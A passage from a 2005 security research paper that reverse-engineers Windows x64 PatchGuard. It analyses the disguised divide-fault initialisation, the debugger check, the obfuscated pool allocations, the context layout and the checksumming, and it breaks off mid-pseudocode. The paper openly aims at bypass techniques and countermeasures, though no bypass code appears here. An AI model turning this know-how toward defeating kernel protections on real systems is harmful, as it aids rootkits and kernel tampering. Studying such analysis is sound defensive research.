mirror of https://github.com/fdiskyou/Zines.git
2070 lines
88 KiB
Plaintext
2070 lines
88 KiB
Plaintext
Bypassing PatchGuard on Windows x64
|
|
skape & Skywing
|
|
Dec 1, 2005
|
|
|
|
|
|
1) Foreword
|
|
|
|
Abstract: The Windows kernel that runs on the x64 platform
|
|
has introduced a new feature, nicknamed PatchGuard, that is intended
|
|
to prevent both malicious software and third-party vendors from
|
|
modifying certain critical operating system structures. These
|
|
structures include things like specific system images, the SSDT, the
|
|
IDT, the GDT, and certain critical processor MSRs. This feature is
|
|
intended to ensure kernel stability by preventing uncondoned
|
|
behavior, such as hooking. However, it also has the side effect of
|
|
preventing legitimate products from working properly. For that
|
|
reason, this paper will serve as an in-depth analysis of
|
|
PatchGuard's inner workings with an eye toward techniques that can
|
|
be used to bypass it. Possible solutions will also be proposed for
|
|
the bypass techniques that are suggested.
|
|
|
|
Thanks: The authors would like to thank westcose, bugcheck, uninformed,
|
|
Alex Ionescu, Filip Navara, and everyone who is motivated to learn by
|
|
their own self interest.
|
|
|
|
Disclaimer: The subject matter discussed in this document is
|
|
presented in the interest of education. The authors cannot be held
|
|
responsible for how the information is used. While the authors have
|
|
tried to be as thorough as possible in their analysis, it is possible
|
|
that they have made one or more mistakes. If a mistake is observed,
|
|
please contact one or both of the authors so that it can be corrected.
|
|
|
|
2) Introduction
|
|
|
|
|
|
In the caste system of operating systems, the kernel is king. And
|
|
like most kings, the kernel is capable of defending itself from the
|
|
lesser citizens, such as user-mode processes, through the castle
|
|
walls of privilege separation. However, unlike most kings, the
|
|
kernel is typically unable to defend itself from the same privilege
|
|
level at which it operates. Without the kernel being able to
|
|
protect its vital organs at its own privilege level, the entire
|
|
operating system is left open to modification and subversion if any
|
|
code is able to run with the same privileges as the kernel itself.
|
|
|
|
As it stands today, most kernel implementations do not provide a
|
|
mechanism by which critical portions of the kernel can be validated
|
|
to ensure that they have not been tampered with. If existing
|
|
kernels were to attempt to deploy something like this in an
|
|
after-the-fact manner, it should be expected that a large number of
|
|
problems would be encountered with regard to compatibility. While
|
|
most kernels intentionally do not document how internal aspects are
|
|
designed to function, like how system call dispatching works, it is
|
|
likely that at least one or more third-party vendor may depend on
|
|
some of the explicit behaviors of the undocumented implementations.
|
|
|
|
This has been exactly the case with Microsoft's operating systems.
|
|
Starting even in the days of Windows 95, and perhaps even prior to
|
|
that, Microsoft realized that allowing third-party vendors to
|
|
twiddle or otherwise play with various critical portions of the
|
|
kernel lead to nothing but headaches and stability problems, even
|
|
though it provided the highest level of flexibility. While
|
|
Microsoft took a stronger stance with Windows NT, it has still
|
|
become the case that third-party vendors use areas of the kernel
|
|
that are of particular interest to accomplishing certain feats, even
|
|
though the means used to accomplish them require the use of
|
|
undocumented structures and functions.
|
|
|
|
While it's likely that Microsoft realized their fate long ago with
|
|
regard to losing control over the scope and types of changes they
|
|
could make to the kernel internally without affecting third-party
|
|
vendors, their ability to do anything about it has been drastically
|
|
limited. If Microsoft were to deploy code that happened to prevent
|
|
major third-party vendors from being able to accomplish their goals
|
|
without providing an adequate replacement, then Microsoft would be
|
|
in a world of hurt that would most likely rhyme with
|
|
antitrust. Even though things have appeared bleak,
|
|
Microsoft got their chance to reclaim higher levels of flexibility
|
|
in the kernel with the introduction of the x64
|
|
architecture. While some places used x64 to mean both AMD64
|
|
and IA64, this document will generally refer to x64 as an alias for
|
|
AMD64 only, though many of the comments may also apply to IA64.
|
|
Since the Windows kernel on the x64 architecture operates in 64-bit
|
|
mode, it stands as a requirement that all kernel-mode drivers also
|
|
be compiled to run and operate in native 64-bit mode. There are a
|
|
number of reasons for this that are outside of the scope of this
|
|
document, but suffice it to say that attempting to design a thunking
|
|
layer for device drivers that are intended to have any real
|
|
considerations for performance should be enough to illustrate that
|
|
doing so would be a horrible idea.
|
|
|
|
By requiring that all device drivers be compiled natively as 64-bit
|
|
binaries, Microsoft effectively leveled the playing field on the new
|
|
platform and brought it back to a clean slate. This allowed them to
|
|
not have to worry about potential compatibility conflicts with
|
|
existing products because of the simple fact that none had been
|
|
established. As third-party vendors ported their device drivers to
|
|
64-bit mode, any unsupported or uncondoned behavior on the part of
|
|
the driver could be documented as being prohibited on the x64
|
|
architecture, thus forcing the third-party to find an alternative
|
|
approach if possible. This is the dream of PatchGuard,
|
|
Microsoft's anti-patch protection system, and it seems logical that
|
|
such a goal is a reasonable one, but that's not the point of this
|
|
document.
|
|
|
|
Instead, this document will focus on the changes to the x64 kernel
|
|
that are designed to protect critical portions of the Windows kernel
|
|
from being modified. This document will describe how the protection
|
|
mechanisms are implemented and what areas of the kernel are
|
|
protected. From there, a couple of different approaches that could
|
|
be used to disable and bypass the protection mechanisms will be
|
|
explained in detail as well as potential solutions to the bypass
|
|
techniques. In conclusion, the reasons and motivations will be
|
|
summarized and other solutions to the more fundamental problem will
|
|
be discussed.
|
|
|
|
The real purpose of this document, though, is to illustrate that it
|
|
is impossible to securely protect regions of code and data through
|
|
the use of a system that involves monitoring said regions at a
|
|
privilege level that is equal to the level at which third-party code
|
|
is capable of running. This fact is something that is well-known,
|
|
both by Microsoft and by the security population at large,
|
|
and it should be understood without requiring an explanation. Going
|
|
toward the future, the operating system world will most likely begin
|
|
to see a shift toward more granular, hardware-enforced privilege
|
|
separation by implementing segregated trusted code bases. The
|
|
questions this will raise with respect to open-source operating
|
|
systems and DRM issues should slowly begin to increase. Only time
|
|
will tell.
|
|
|
|
3) Implementation
|
|
|
|
|
|
The anti-patching technology provided in the Windows x64 kernel,
|
|
nicknamed PatchGuard, is intended to protect critical kernel
|
|
structures from being modified outside of the context of approved
|
|
modifications, such as through Microsoft-controlled hot patching. At
|
|
the time of this writing, PatchGuard is designed to protect the
|
|
following critical structures:
|
|
|
|
|
|
- SSDT (System Service Descriptor Table)
|
|
- GDT (Global Descriptor Table)
|
|
- IDT (Interrupt Descriptor Table)
|
|
- System images (ntoskrnl.exe, ndis.sys, hal.dll)
|
|
- Processor MSRs (syscall)
|
|
|
|
|
|
At a high-level, PatchGuard is implemented in the form of a set of
|
|
routines that cache known-good copies and/or checksums of structures
|
|
which are then validated at certain random time intervals (roughly
|
|
every 5 - 10 minutes). The reason PatchGuard is implemented in a
|
|
polling fashion rather than in an event-driven or hardware-backed
|
|
fashion is because there is no native hardware level support for the
|
|
things that PatchGuard is attempting to accomplish. For that
|
|
reason, a number of the tricks that PatchGuard resorted to were done
|
|
so out of necessity.
|
|
|
|
The team that worked on PatchGuard was admittedly very clever. They
|
|
realized the limitations of implementing an anti-patching model in a
|
|
fashion described in the introduction and thus were forced to resort
|
|
to other means by which they might augment the protection
|
|
mechanisms. In particular, PatchGuard makes extensive use of
|
|
security through obscurity by using tactics like misdirection,
|
|
misnamed functions, and general code obfuscation. While many would
|
|
argue that security through obscurity adds nothing, the authors
|
|
believe that it's merely a matter of raising the bar high enough so
|
|
as to eliminate a significant number of people from being able to
|
|
completely understand something.
|
|
|
|
The code to initialize PatchGuard begins early on in the boot
|
|
process as part of nt!KeInitSystem. And that's where the fun begins.
|
|
|
|
3.1) Initializing PatchGuard
|
|
|
|
|
|
The initialization of PatchGuard is multi-faceted, but it all has to
|
|
start somewhere. In this case, the initialization of PatchGuard starts
|
|
in a function with a symbol name that has nothing to do with anti-patch
|
|
protections at all. In fact, it's named KiDivide6432 and the only thing
|
|
that it does is a division operation as shown in the code below:
|
|
|
|
|
|
ULONG KiDivide6432(
|
|
IN ULONG64 Dividend,
|
|
IN ULONG Divisor)
|
|
{
|
|
return Dividend / Divisor;
|
|
}
|
|
|
|
|
|
Though this function may look innocuous, it's actually the first time
|
|
PatchGuard attempts to use misdirection to hide its actual intentions.
|
|
In this case, the call to nt!KiDivide6432 is passed a dividend value
|
|
from nt!KiTestDividend. The divisor is hard-coded to be 0xcb5fa3. It
|
|
appears that this function is intended to masquerade as some type of
|
|
division test that ensures that the underlying architecture supports
|
|
division operations. If the call to the function does not return the
|
|
expected result of 0x5ee0b7e5, nt!KeInitSystem will bug check the
|
|
operating system with bug check code 0x5d which is UNSUPPORTED_PROCESSOR
|
|
as shown below:
|
|
|
|
|
|
nt!KeInitSystem+0x158:
|
|
fffff800`014212c2 488b0d1754d5ff mov rcx,[nt!KiTestDividend]
|
|
fffff800`014212c9 baa35fcb00 mov edx,0xcb5fa3
|
|
fffff800`014212ce e84d000000 call nt!KiDivide6432
|
|
fffff800`014212d3 3de5b7e05e cmp eax,0x5ee0b7e5
|
|
fffff800`014212d8 0f8519b60100 jne nt!KeInitSystem+0x170
|
|
|
|
...
|
|
|
|
nt!KeInitSystem+0x170:
|
|
fffff800`0143c8f7 b95d000000 mov ecx,0x5d
|
|
fffff800`0143c8fc e8bf4fc0ff call nt!KeBugCheck
|
|
|
|
|
|
When attaching with local kd, the value of nt!KiTestDividend is found to
|
|
be hardcoded to 0x014b5fa3a053724c such that doing the division
|
|
operation, 0x014b5fa3a053724c divided by 0xcb5fa3, produces 0x1a11f49ae.
|
|
That can't be right though, can it? Obviously, the code above indicates
|
|
that any value other than 0x5ee0b7e5 will lead to a bug check, but it's
|
|
also equally obvious that the machine does not bug check on boot, so
|
|
what's going on here?
|
|
|
|
The answer involves a good old fashion case of ingenuity. The result of
|
|
the the division operation above is a value that is larger than 32 bits.
|
|
The AMD64 instruction set reference manual indicates that the div
|
|
instruction will produce a divide error fault when an overflow of the
|
|
quotient occurs. This means that as long as nt!KiTestDividend is set to
|
|
the value described above, a divide error fault will be triggered
|
|
causing a hardware exception that has to be handled by the kernel. This
|
|
divide error fault is what actually leads to the indirect initialization
|
|
of the PatchGuard subsystem. Before going down that route, though, it's
|
|
important to understand one of the interesting aspects of the way
|
|
Microsoft did this.
|
|
|
|
One of the interesting things about nt!KiTestDividend is that it's
|
|
actually unioned with an exported symbol that is used to indicate
|
|
whether or not a debugger is, well, present. This symbol is named
|
|
nt!KdDebuggerNotPresent and it overlaps with the high-order byte of
|
|
nt!KiTestDividend as shown below:
|
|
|
|
|
|
TestDividend L1
|
|
fffff800`011766e0 014b5fa3`a053724c
|
|
lkd> db nt!KdDebuggerNotPresent L1
|
|
fffff800`011766e7 01
|
|
|
|
|
|
The nt!KdDebuggerNotPresent global variable will be set to zero if a
|
|
debugger is present. If a debugger is not present, the value will be
|
|
one (default). If the above described division operation is performed
|
|
while a debugger is attached to the system during boot, which would
|
|
equate to dividing 0x004b5fa3a053724c by 0xcb5fa3, the resultant
|
|
quotient will be the expected value of 0x5ee0b7e5. This means that if a
|
|
debugger is attached to the system prior to the indirect initialization
|
|
of the PatchGuard protections, then the protections will not be
|
|
initialized because the divide error fault will not be triggered. This
|
|
coincides with the documented behavior and is intended to allow driver
|
|
developers to continue to be able to set breakpoints and perform other
|
|
actions that may indirectly modify monitored regions of the kernel in a
|
|
debugging environment. However, this only works if the debugger is
|
|
attached to the system during boot. If a developer subsequently
|
|
attaches a debugger after PatchGuard has initialized, then the act of
|
|
setting breakpoints or performing other actions may lead to a bluescreen
|
|
as a result of PatchGuard detecting the alterations. Microsoft's choice
|
|
to initialize PatchGuard in this manner allows it to transparently
|
|
disable protections when a debugger is attached and also acts as a means
|
|
of hiding the true initialization vector.
|
|
|
|
With the unioned aspect of nt!KiTestDividend understood, the next step
|
|
is to understand how the divide error fault actually leads to the
|
|
initialization of the PatchGuard subsystem. For this aspect it is
|
|
necessary to start at the places that all divide error faults go:
|
|
nt!KiDivideErrorFault.
|
|
|
|
The indirect triggering of nt!KiDivideErrorFault leads to a series of
|
|
function calls that eventually result in nt!KiOpDiv being called to
|
|
handle the divide error fault for the div instruction. The nt!KiOpDiv
|
|
routine appears to be responsible for preprocessing the different kinds
|
|
of divide errors, like divide by zero. Although it may look normal at
|
|
first glance, nt!KiOpDiv also has a darker side. The stack trace that
|
|
leads to the calling of nt!KiOpDiv is shown below. For those curious as
|
|
to how the authors were able to debug the PatchGuard initialization
|
|
vector that is intended to be disabled when a debugger is attached, one
|
|
method is to simply break on the div instruction in nt!KiDivide6432 and
|
|
change r8d to zero. This will generate the divide error fault and lead
|
|
to the calling of the PatchGuard initialization routines. In order to
|
|
allow the machine to boot normally, a breakpoint must be set on
|
|
nt!KiDivide6432 after the fact to automatically restore r8d to 0xcb5fa3:
|
|
|
|
|
|
kd> k
|
|
Child-SP RetAddr Call Site
|
|
fffffadf`e4a15f90 fffff800`010144d4 nt!KiOp_Div+0x29
|
|
fffffadf`e4a15fe0 fffff800`01058d75 nt!KiPreprocessFault+0xc7
|
|
fffffadf`e4a16080 fffff800`0104172f nt!KiDispatchException+0x85
|
|
fffffadf`e4a16680 fffff800`0103f5b7 nt!KiExceptionExit
|
|
fffffadf`e4a16800 fffff800`0142132b nt!KiDivideErrorFault+0xb7
|
|
fffffadf`e4a16998 fffff800`014212d3 nt!KiDivide6432+0xb
|
|
fffffadf`e4a169a0 fffff800`0142a226 nt!KeInitSystem+0x169
|
|
fffffadf`e4a16a50 fffff800`01243e09 nt!Phase1InitializationDiscard+0x93e
|
|
fffffadf`e4a16d40 fffff800`012b226e nt!Phase1Initialization+0x9
|
|
fffffadf`e4a16d70 fffff800`01044416 nt!PspSystemThreadStartup+0x3e
|
|
fffffadf`e4a16dd0 00000000`00000000 nt!KxStartSystemThread+0x16
|
|
|
|
|
|
The first thing that nt!KiOpDiv does prior to processing the actual
|
|
divide fault is to call a function named nt!KiFilterFiberContext. This
|
|
function seems oddly named not only in the general sense but also in the
|
|
specific context of a routine that is intended to be dealing with divide
|
|
faults. By looking at the body of nt!KiFilterFiberContext, its
|
|
intentions quickly become clear:
|
|
|
|
|
|
nt!KiFilterFiberContext:
|
|
fffff800`01003ac2 53 push rbx
|
|
fffff800`01003ac3 4883ec20 sub rsp,0x20
|
|
fffff800`01003ac7 488d0552d84100 lea rax,[nt!KiDivide6432]
|
|
fffff800`01003ace 488bd9 mov rbx,rcx
|
|
fffff800`01003ad1 4883c00b add rax,0xb
|
|
fffff800`01003ad5 483981f8000000 cmp [rcx+0xf8],rax
|
|
fffff800`01003adc 0f855d380c00 jne nt!KiFilterFiberContext+0x1d
|
|
fffff800`01003ae2 e899fa4100 call nt!KiDivide6432+0x570
|
|
|
|
|
|
It appears that this chunk of code is designed to see if the address
|
|
that the fault error occurred at is equal to nt!KiDivide6432 + 0xb. If
|
|
one adds 0xb to nt!KiDivide6432 and disassembles the instruction at that
|
|
address, the result is:
|
|
|
|
|
|
nt!KiDivide6432+0xb:
|
|
fffff800`0142132b 41f7f0 div r8d
|
|
|
|
|
|
This coincides with what one would expect to occur when the quotient
|
|
overflow condition occurs. According to the disassembly above, if the
|
|
fault address is equal to nt!KiDivide6432 + 0xb, then an unnamed symbol
|
|
is called at nt!KiDivide6432 + 0x570. This unnamed symbol will
|
|
henceforth be referred to as nt!KiInitializePatchGuard, and it is what
|
|
drives the set up of the PatchGuard subsystem.
|
|
|
|
The nt!KiInitializePatchGuard routine itself is quite large. It handles
|
|
the initialization of the contexts that will monitor certain system
|
|
images, the SSDT, processor GDT/IDT, certain critical MSRs, and certain
|
|
debugger-related routines. The very first thing that the initialization
|
|
routine does is to check to see if the machine is being booted in safe
|
|
mode. If it is being booted in safe mode, the PatchGuard subsystem will
|
|
not be enabled as shown below:
|
|
|
|
|
|
nt!KiDivide6432+0x570:
|
|
fffff800`01423580 4881ecd8020000 sub rsp,0x2d8
|
|
fffff800`01423587 833d22dfd7ff00 cmp dword ptr [nt!InitSafeBootMode],0x0
|
|
fffff800`0142358e 0f8504770000 jne nt!KiDivide6432+0x580
|
|
|
|
...
|
|
|
|
nt!KiDivide6432+0x580:
|
|
fffff800`0142ac98 b001 mov al,0x1
|
|
fffff800`0142ac9a 4881c4d8020000 add rsp,0x2d8
|
|
fffff800`0142aca1 c3 ret
|
|
|
|
|
|
Once the safe mode check has passed, nt!KiInitializePatchGuard begins
|
|
the PatchGuard initialization by calculating the size of the INITKDBG
|
|
section in ntoskrnl.exe. It accomplishes this by passing the address of
|
|
a symbol found within that section, nt!FsRtlUninitializeSmallMcb, to
|
|
nt!RtlPcToFileHeader. This routine passes back the base address of nt
|
|
in an output parameter that is subsequently passed to
|
|
nt!RtlImageNtHeader. This method returns a pointer to the image's
|
|
IMAGENTHEADERS structure. From there, the virtual address of
|
|
nt!FsRtlUninitializeSmallMcb is calculated by subtracting the base
|
|
address of nt from it. The calculated RVA is then passed to
|
|
nt!RtlSectionTableFromVirtualAddress which returns a pointer to the
|
|
image section that nt!FsRtlUninitializeSmallMcb resides in. The
|
|
debugger output below shows what rax points to after obtaining the image
|
|
section structure:
|
|
|
|
|
|
kd> ? rax
|
|
Evaluate expression: -8796076244456 = fffff800`01000218
|
|
kd> dt nt!_IMAGE_SECTION_HEADER fffff800`01000218
|
|
+0x000 Name : [8] "INITKDBG"
|
|
+0x008 Misc : <unnamed-tag>
|
|
+0x00c VirtualAddress : 0x165000
|
|
+0x010 SizeOfRawData : 0x2600
|
|
+0x014 PointerToRawData : 0x163a00
|
|
+0x018 PointerToRelocations : 0
|
|
+0x01c PointerToLinenumbers : 0
|
|
+0x020 NumberOfRelocations : 0
|
|
+0x022 NumberOfLinenumbers : 0
|
|
+0x024 Characteristics : 0x68000020
|
|
|
|
|
|
The whole reason behind this initial image section lookup has to do with
|
|
one of the ways in which PatchGuard obfuscates and hides the code that
|
|
it executes. In this case, code within the INITKDBG section will
|
|
eventually be copied into an allocated protection context that will be
|
|
used during the validation phase. The reason that this is necessary
|
|
will be discussed in more detail later.
|
|
|
|
After collecting information about the INITKDBG image section, the
|
|
PatchGuard initialization routine performs the first of many
|
|
pseudo-random number generations. This code can be seen throughout the
|
|
PatchGuard functions and has a form that is similar to the code shown
|
|
below:
|
|
|
|
|
|
fffff800`0142362d 0f31 rdtsc
|
|
fffff800`0142362f 488bac24d8020000 mov rbp,[rsp+0x2d8]
|
|
fffff800`01423637 48c1e220 shl rdx,0x20
|
|
fffff800`0142363b 49bf0120000480001070 mov r15,0x7010008004002001
|
|
fffff800`01423645 480bc2 or rax,rdx
|
|
fffff800`01423648 488bcd mov rcx,rbp
|
|
fffff800`0142364b 4833c8 xor rcx,rax
|
|
fffff800`0142364e 488d442478 lea rax,[rsp+0x78]
|
|
fffff800`01423653 4833c8 xor rcx,rax
|
|
fffff800`01423656 488bc1 mov rax,rcx
|
|
fffff800`01423659 48c1c803 ror rax,0x3
|
|
fffff800`0142365d 4833c8 xor rcx,rax
|
|
fffff800`01423660 498bc7 mov rax,r15
|
|
fffff800`01423663 48f7e1 mul rcx
|
|
fffff800`01423666 4889442478 mov [rsp+0x78],rax
|
|
fffff800`0142366b 488bca mov rcx,rdx
|
|
fffff800`0142366e 4889942488000000 mov [rsp+0x88],rdx
|
|
fffff800`01423676 4833c8 xor rcx,rax
|
|
fffff800`01423679 48b88fe3388ee3388ee3 mov rax,0xe38e38e38e38e38f
|
|
fffff800`01423683 48f7e1 mul rcx
|
|
fffff800`01423686 48c1ea03 shr rdx,0x3
|
|
fffff800`0142368a 488d04d2 lea rax,[rdx+rdx*8]
|
|
fffff800`0142368e 482bc8 sub rcx,rax
|
|
fffff800`01423691 8bc1 mov eax,ecx
|
|
|
|
|
|
This pseudo-random number generator uses the rdtsc instruction as a seed
|
|
and then proceeds to perform various bitwise and multiplication
|
|
operations until the end result is produced in eax. The result of this
|
|
first random number generator is used to index an array of pool tags
|
|
that are used for PatchGuard memory allocations. This is an example of
|
|
one of the many ways in which PatchGuard attempts to make it harder to
|
|
find its own internal data structures in memory. In this case, it adopts
|
|
a random legitimate pool tag in an effort to blend in with other memory
|
|
allocations. The code block below shows how the pool tag array is
|
|
indexed and where it can be found in memory:
|
|
|
|
|
|
fffff800`01423693 488d0d66c9bdff lea rcx,[nt]
|
|
fffff800`0142369a 448b848100044300 mov r8d,[rcx+rax*4+0x430400]
|
|
|
|
|
|
In this case, the random number is stored in the rax register which is
|
|
used to index the array of pool tags found at nt+0x430400. The fact
|
|
that the array is referenced indirectly might be seen as another attempt
|
|
at obfuscation in a bid to make what is occurring less obvious at a
|
|
glance. If the pool tag array address is dumped in the debugger, all of
|
|
the pool tags that could possibly be used by PatchGuard can be seen:
|
|
|
|
|
|
lkd> db nt+0x430400
|
|
41 63 70 53 46 69 6c 65-49 70 46 49 49 72 70 20 AcpSFileIpFIIrp
|
|
4d 75 74 61 4e 74 46 73-4e 74 72 66 53 65 6d 61 MutaNtFsNtrfSema
|
|
54 43 50 63 00 00 00 00-10 3b 03 01 00 f8 ff ff TCPc.....;......
|
|
|
|
|
|
After the fake pool tag has been selected from the array at random,
|
|
the PatchGuard initialization routine proceeds by allocating a random
|
|
amount of storage that is bounded at a minimum by the virtual size of
|
|
the INITKDBG section plus 0x1b8 and at a maximum by the minimum plus
|
|
0x7ff. The magic value 0x1b8 that is expressed in the minimum size is
|
|
actually the size of the data structure that is used by PatchGuard to
|
|
store context-specific protection information, as will be shown later.
|
|
The fake pool tag and the random size are then used to allocate storage
|
|
from the NonPagedPool as shown in the pseudo-code below:
|
|
|
|
|
|
Context = ExAllocatePoolWithTag(
|
|
NonPagedPool,
|
|
(InitKdbgSection->VirtualSize + 0x1b8) + (RandSize & 0x7ff),
|
|
PoolTagArray[RandomPoolTagIndex]);
|
|
|
|
|
|
If the allocation of the context succeeds, the initialization routine
|
|
zeroes its contents and then starts initializing some of the structure's
|
|
attributes. The context returned by the allocation will henceforth be
|
|
referred to as a structure of type PATCHGUARD_CONTEXT. The first 0x48
|
|
bytes of the structure are actually composed of code that is copied from
|
|
the misleading symbol named nt!CmpAppendDllSection. This function is
|
|
actually used to decrypt the structure at runtime, as will be seen
|
|
later. After nt!CmpAppendDllSection is copied to the first 0x48 bytes of
|
|
the data structure, the initialization routine sets up a number of
|
|
function pointers that are stored within the structure. The routines
|
|
that it stores the addresses of and the offsets within the PatchGuard
|
|
context data structure are shown below.
|
|
|
|
|
|
+--------+-------------------------------------------+
|
|
| Offset | Symbol |
|
|
+--------+-------------------------------------------+
|
|
| 0x48 | nt!ExAcquireResourceSharedLite |
|
|
| 0x50 | nt!ExAllocatePoolWithTag |
|
|
| 0x58 | nt!ExFreePool |
|
|
| 0x60 | nt!ExMapHandleToPointer |
|
|
| 0x68 | nt!ExQueueWorkItem |
|
|
| 0x70 | nt!ExReleaseResourceLite |
|
|
| 0x78 | nt!ExUnlockHandleTableEntry |
|
|
| 0x80 | nt!ExAcquireGuardedMutex |
|
|
| 0x88 | nt!ObDereferenceObjectEx |
|
|
| 0x90 | nt!KeBugCheckEx |
|
|
| 0x98 | nt!KeInitializeDpc |
|
|
| 0xa0 | nt!KeLeaveCriticalRegion |
|
|
| 0xa8 | nt!KeReleaseGuardedMutex |
|
|
| 0xb0 | nt!ObDereferenceObjectEx2 |
|
|
| 0xb8 | nt!KeSetAffinityThread |
|
|
| 0xc0 | nt!KeSetTimer |
|
|
| 0xc8 | nt!RtlImageDirectoryEntryToData |
|
|
| 0xd0 | nt!RtlImageNtHeaders |
|
|
| 0xd8 | nt!RtlLookupFunctionEntry |
|
|
| 0xe0 | nt!RtlSectionTableFromVirtualAddress |
|
|
| 0xe8 | nt!KiOpPrefetchPatchCount |
|
|
| 0xf0 | nt!KiProcessListHead |
|
|
| 0xf8 | nt!KiProcessListLock |
|
|
| 0x100 | nt!PsActiveProcessHead |
|
|
| 0x108 | nt!PsLoadedModuleList |
|
|
| 0x110 | nt!PsLoadedModuleResource |
|
|
| 0x118 | nt!PspActiveProcessMutex |
|
|
| 0x120 | nt!PspCidTable |
|
|
+--------+-------------------------------------------+
|
|
|
|
PATCHGUARD_CONTEXT function pointers
|
|
|
|
|
|
The reason that PatchGuard uses function pointers instead of calling the
|
|
symbols directly is most likely due to the relative addressing mode used
|
|
in x64. Since the PatchGuard code runs dynamically from unpredictable
|
|
addresses, it would be impossible to use the relative addressing mode
|
|
without having to fix up instructions -- a task that would no doubt be
|
|
painful and not really worth the trouble. The authors do not see any
|
|
particular advantage gained in terms of obfuscation by the use of
|
|
function pointers stored in the PatchGuard context structure.
|
|
|
|
After all of the function pointers have been set up, the initialization
|
|
routine proceeds by picking another random pool tag that is used for
|
|
subsequent allocations and stores it at offset 0x188 within the
|
|
PatchGuard context structure. After that, two more random numbers are
|
|
generated, both of which are used later on during the encryption phase
|
|
of the structure. One is used as a random number of rotate bits, the
|
|
other is used as an XOR seed. The XOR seed is stored at offset 0x190
|
|
and the random rotate bits value is stored at offset 0x18c.
|
|
|
|
The next step taken by the initialization routine is to acquire the
|
|
number of bits that can be used to represent the virtual address space
|
|
by querying the processor via through the cpuid ExtendedAddressSize
|
|
(0x80000008) extended function. The result is stored at offset 0x1b4
|
|
within the PatchGuard context structure.
|
|
|
|
Finally, the last major step before initializing the individual
|
|
protection sub-contexts is the copying of the contents of the INITKDBG
|
|
section to the allocated PatchGuard context structure. The copy
|
|
operation looks something like the pseudo code below:
|
|
|
|
|
|
memmove(
|
|
(PCHAR)PatchGuardContext + sizeof(PATCHGUARD_CONTEXT),
|
|
NtImageBase + InitKdbgSection->VirtualAddress,
|
|
InitKdbgSection->VirtualSize);
|
|
|
|
|
|
With the primary portions of the PatchGuard context structure
|
|
initialized, the next logical step is to initialize the sub-contexts
|
|
that are specific to the things that are actually being protected.
|
|
|
|
3.2) Protected Structure Initialization
|
|
|
|
|
|
The structures that PatchGuard protects are represented by individual
|
|
sub-context structures. These structures are composed at the beginning
|
|
by the contents of the parent PatchGuard structure (PATCHGUARD_CONTEXT).
|
|
This includes the function pointers and other values assigned to the
|
|
parent. The sub-contexts are identified by general types that provide
|
|
the validation routine with something to key off of.
|
|
|
|
This section will explain how each of the individual structures have
|
|
their protection sub-contexts initialized. At the time of this writing,
|
|
the structures have their protection sub-contexts initialized in the
|
|
order described below:
|
|
|
|
|
|
- System images
|
|
- SSDT
|
|
- GDT/IDT/MSRs
|
|
- Debug routines
|
|
|
|
|
|
After all the sub-contexts have been initialized, the parent protection
|
|
context is XOR'd and a timer is initialized and set. The purpose of
|
|
this timer, as will be shown, is to run the validation half of the
|
|
PatchGuard subsystem on the data that is collected. Aside from the
|
|
specific protection sub-contexts listed in the following subsections, it
|
|
was observed by the authors that the routine that initializes the
|
|
PatchGuard subsystem also allocated sub-context structures of types that
|
|
could not be immediately discerned. In particular, these types had the
|
|
sub-context identifiers of 0x4 and 0x5.
|
|
|
|
3.2.1) System Images
|
|
|
|
|
|
The protection of certain key kernel images is one of the more critical
|
|
aspects of PatchGuard's protection schemes. If a driver were still able
|
|
to hook functions in nt, ndis, or any other key kernel components, then
|
|
PatchGuard would be mostly irrelevant. In order to address this
|
|
concern, PatchGuard performs a set of operations that are intended to
|
|
ensure that system images cannot be tampered with. The table in figure
|
|
shows which kernel images are currently protected by this scheme.
|
|
|
|
|
|
+--------------+
|
|
| Image Name |
|
|
+--------------+
|
|
| ntoskrnl.exe |
|
|
| hal.dll |
|
|
| ndis.sys |
|
|
+--------------+
|
|
|
|
Protected kernel images
|
|
|
|
|
|
The approach taken to protect each of these images is the same. To kick
|
|
things off, the address of a symbol that resides within the image is
|
|
passed to a PatchGuard sub-routine that will be referred to as
|
|
nt!PgCreateImageSubContext. This routine is prototyped as shown below:
|
|
|
|
|
|
NTSTATUS PgCreateImageSubContext(
|
|
IN PPATCHGUARD_CONTEXT ParentContext,
|
|
IN LPVOID SymbolAddress);
|
|
|
|
|
|
For ntoskrnl.exe, the address of nt!KiFilterFiberContext is passed in as
|
|
the symbol address. For hal.dll, the address of HalInitializeProcessor
|
|
is passed. Finally, the address passed for ndis.sys is its entry point
|
|
address which is obtained through a call to nt!GetModuleEntryPoint.
|
|
|
|
Inside nt!PgCreateImageSubContext, the basic approach taken to protect
|
|
the images is through the generation of a few distinct PatchGuard
|
|
sub-contexts. The first sub-context is designed to hold the checksum of
|
|
an individual image's sections, with a few exceptions. The second and
|
|
third sub-contexts hold the checksum of an image's Import Address Table
|
|
(IAT) and Import Directory, respectively. These routines all make use
|
|
of a shared routine that is responsible for generating a protection
|
|
sub-context that holds the checksum for a block of memory using the
|
|
random XOR key and random rotate bits stored in the parent PatchGuard
|
|
context structure. The prototype for this routine is shown below:
|
|
|
|
|
|
typedef struct BLOCK_CHECKSUM_STATE
|
|
{
|
|
ULONG Unknown;
|
|
ULONG64 BaseAddress;
|
|
ULONG BlockSize;
|
|
ULONG Checksum;
|
|
} BLOCK_CHECKSUM_STATE, *PBLOCK_CHECKSUM_STATE;
|
|
|
|
PPATCHGUARD_SUB_CONTEXT PgCreateBlockChecksumSubContext(
|
|
IN PPATCHGUARD_CONTEXT Context,
|
|
IN ULONG Unknown,
|
|
IN PVOID BlockAddress,
|
|
IN ULONG BlockSize,
|
|
IN ULONG SubContextSize,
|
|
OUT PBLOCK_CHECKSUM_STATE ChecksumState OPTIONAL);
|
|
|
|
|
|
The block checksum sub-context stores the checksum state at the end of
|
|
the PATCHGUARDC_ONTEXT. The checksum state is stored in a
|
|
BLOCK_CHECKSUM_STATE structure. The Unknown attribute of the structure is
|
|
initialized to the Unknown parameter from
|
|
nt!PgCreateBlockChecksumSubContext. The purpose of this field was not
|
|
deduced, but the value was set to zero during debugging.
|
|
|
|
The checksum algorithm used by the routine is fairly simple. The
|
|
pseudo-code below shows how it works conceptually:
|
|
|
|
|
|
ULONG64 Checksum = Context->RandomHashXorSeed;
|
|
ULONG Checksum32;
|
|
|
|
// Checksum 64-bit blocks
|
|
while (BlockSize >= sizeof(ULONG64))
|
|
{
|
|
Checksum ^= *(PULONG64)BaseAddress;
|
|
Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits);
|
|
BlockSize -= sizeof(ULONG64);
|
|
BaseAddress += sizeof(ULONG64);
|
|
}
|
|
|
|
// Checksum aligned blocks
|
|
while (BlockSize-- > 0)
|
|
{
|
|
Checksum ^= *(PUCHAR)BaseAddress;
